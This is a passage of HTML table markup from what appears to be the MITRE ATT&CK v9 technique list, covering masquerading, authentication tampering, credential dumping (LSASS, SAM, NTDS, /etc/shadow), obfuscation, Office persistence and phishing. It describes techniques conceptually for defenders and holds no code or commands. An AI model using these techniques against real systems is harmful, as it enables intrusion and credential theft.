legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1036/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1036/004"> Masquerade Task or Service </a> </td> <td> Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description. Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1036/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1036/005"> Match Legitimate Name or Location </a> </td> <td> Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1036/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1036/006"> Space after Filename </a> </td> <td> Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1556"> T1556 </a> </td> <td> <a href="/versions/v9/techniques/T1556"> Modify Authentication Process </a> </td> <td> Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using <a href="/versions/v9/techniques/T1078">Valid Accounts</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1556/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1556/001"> Domain Controller Authentication </a> </td> <td> Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1556/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1556/002"> Password Filter DLL </a> </td> <td> Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1556/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1556/003"> Pluggable Authentication Modules </a> </td> <td> Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1556/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1556/004"> Network Device Authentication </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1601/001">Patch System Image</a> to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1578"> T1578 </a> </td> <td> <a href="/versions/v9/techniques/T1578"> Modify Cloud Compute Infrastructure </a> </td> <td> An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1578/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1578/001"> Create Snapshot </a> </td> <td> An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in <a href="/versions/v9/techniques/T1578/004">Revert Cloud Instance</a> where an adversary may revert to a snapshot to evade detection and remove evidence of their presence. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1578/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1578/002"> Create Cloud Instance </a> </td> <td> An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may <a href="/versions/v9/techniques/T1578/001">Create Snapshot</a> of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect <a href="/versions/v9/techniques/T1005">Data from Local System</a> or for <a href="/versions/v9/techniques/T1074/002">Remote Data Staging</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1578/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1578/003"> Delete Cloud Instance </a> </td> <td> An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1578/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1578/004"> Revert Cloud Instance </a> </td> <td> An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1112"> T1112 </a> </td> <td> <a href="/versions/v9/techniques/T1112"> Modify Registry </a> </td> <td> Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1601"> T1601 </a> </td> <td> <a href="/versions/v9/techniques/T1601"> Modify System Image </a> </td> <td> Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1601/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1601/001"> Patch System Image </a> </td> <td> Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses. Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1601/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1601/002"> Downgrade System Image </a> </td> <td> Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1104"> T1104 </a> </td> <td> <a href="/versions/v9/techniques/T1104"> Multi-Stage Channels </a> </td> <td> Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1106"> T1106 </a> </td> <td> <a href="/versions/v9/techniques/T1106"> Native API </a> </td> <td> Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1599"> T1599 </a> </td> <td> <a href="/versions/v9/techniques/T1599"> Network Boundary Bridging </a> </td> <td> Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1599/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1599/001"> Network Address Translation Traversal </a> </td> <td> Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1498"> T1498 </a> </td> <td> <a href="/versions/v9/techniques/T1498"> Network Denial of Service </a> </td> <td> Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes and to support other malicious activities, including distraction, hacktivism, and extortion. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1498/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1498/001"> Direct Network Flood </a> </td> <td> Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. <a href="/versions/v9/techniques/T1498/001">Direct Network Flood</a> are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1498/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1498/002"> Reflection Amplification </a> </td> <td> Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1046"> T1046 </a> </td> <td> <a href="/versions/v9/techniques/T1046"> Network Service Scanning </a> </td> <td> Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1135"> T1135 </a> </td> <td> <a href="/versions/v9/techniques/T1135"> Network Share Discovery </a> </td> <td> Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1040"> T1040 </a> </td> <td> <a href="/versions/v9/techniques/T1040"> Network Sniffing </a> </td> <td> Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1095"> T1095 </a> </td> <td> <a href="/versions/v9/techniques/T1095"> Non-Application Layer Protocol </a> </td> <td> Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1571"> T1571 </a> </td> <td> <a href="/versions/v9/techniques/T1571"> Non-Standard Port </a> </td> <td> Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088 or port 587 as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1027"> T1027 </a> </td> <td> <a href="/versions/v9/techniques/T1027"> Obfuscated Files or Information </a> </td> <td> Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1027/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1027/001"> Binary Padding </a> </td> <td> Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1027/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1027/002"> Software Packing </a> </td> <td> Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1027/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1027/003"> Steganography </a> </td> <td> Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1027/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1027/004"> Compile After Delivery </a> </td> <td> Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1027/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1027/005"> Indicator Removal from Tools </a> </td> <td> Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1588"> T1588 </a> </td> <td> <a href="/versions/v9/techniques/T1588"> Obtain Capabilities </a> </td> <td> Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1588/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1588/001"> Malware </a> </td> <td> Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1588/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1588/002"> Tool </a> </td> <td> Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: <a href="/versions/v9/software/S0029">PsExec</a>). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as <a href="/versions/v9/software/S0154">Cobalt Strike</a>. Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1588/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1588/003"> Code Signing Certificates </a> </td> <td> Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with. Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1588/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1588/004"> Digital Certificates </a> </td> <td> Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1588/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1588/005"> Exploits </a> </td> <td> Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1588/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1588/006"> Vulnerabilities </a> </td> <td> Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1137"> T1137 </a> </td> <td> <a href="/versions/v9/techniques/T1137"> Office Application Startup </a> </td> <td> Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1137/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1137/001"> Office Template Macros </a> </td> <td> Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1137/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1137/002"> Office Test </a> </td> <td> Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1137/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1137/003"> Outlook Forms </a> </td> <td> Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1137/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1137/004"> Outlook Home Page </a> </td> <td> Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1137/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1137/005"> Outlook Rules </a> </td> <td> Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1137/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1137/006"> Add-ins </a> </td> <td> Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1003"> T1003 </a> </td> <td> <a href="/versions/v9/techniques/T1003"> OS Credential Dumping </a> </td> <td> Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform <a href="https://attack.mitre.org/tactics/TA0008">Lateral Movement</a> and access restricted information. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1003/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1003/001"> LSASS Memory </a> </td> <td> Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct <a href="https://attack.mitre.org/tactics/TA0008">Lateral Movement</a> using <a href="/versions/v9/techniques/T1550">Use Alternate Authentication Material</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1003/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1003/002"> Security Account Manager </a> </td> <td> Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1003/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1003/003"> NTDS </a> </td> <td> Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1003/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1003/004"> LSA Secrets </a> </td> <td> Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts. LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1003/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1003/005"> Cached Domain Credentials </a> </td> <td> Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1003/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1003/006"> DCSync </a> </td> <td> Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API) to simulate the replication process from a remote domain controller using a technique called DCSync. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1003/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1003/007"> Proc Filesystem </a> </td> <td> Adversaries may gather credentials from information stored in the Proc filesystem or <code>/proc</code>. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1003/008"> .008 </a> </td> <td> <a href="/versions/v9/techniques/T1003/008"> /etc/passwd and /etc/shadow </a> </td> <td> Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1201"> T1201 </a> </td> <td> <a href="/versions/v9/techniques/T1201"> Password Policy Discovery </a> </td> <td> Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through <a href="/versions/v9/techniques/T1110">Brute Force</a>. This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1120"> T1120 </a> </td> <td> <a href="/versions/v9/techniques/T1120"> Peripheral Device Discovery </a> </td> <td> Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1069"> T1069 </a> </td> <td> <a href="/versions/v9/techniques/T1069"> Permission Groups Discovery </a> </td> <td> Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1069/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1069/001"> Local Groups </a> </td> <td> Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1069/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1069/002"> Domain Groups </a> </td> <td> Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1069/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1069/003"> Cloud Groups </a> </td> <td> Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1566"> T1566 </a> </td> <td> <a href="/versions/v9/techniques/T1566"> Phishing </a> </td> <td> Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1566/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1566/001"> Spearphishing Attachment </a> </td> <td> Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon <a href="/versions/v9/techniques/T1204">User Execution</a> to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1566/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1566/002"> Spearphishing Link </a> </td> <td> Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1566/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1566/003"> Spearphishing via Service </a> </td> <td> Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1598"> T1598 </a> </td> <td> <a href="/versions/v9/techniques/T1598"> Phishing for Information </a> </td> <td> Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from <a href="/versions/v9/techniques/T1566">Phishing</a> in that the objective is gathering data from the victim rather than executing malicious code. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1598/001"> .001 </a> </td> <td> <a 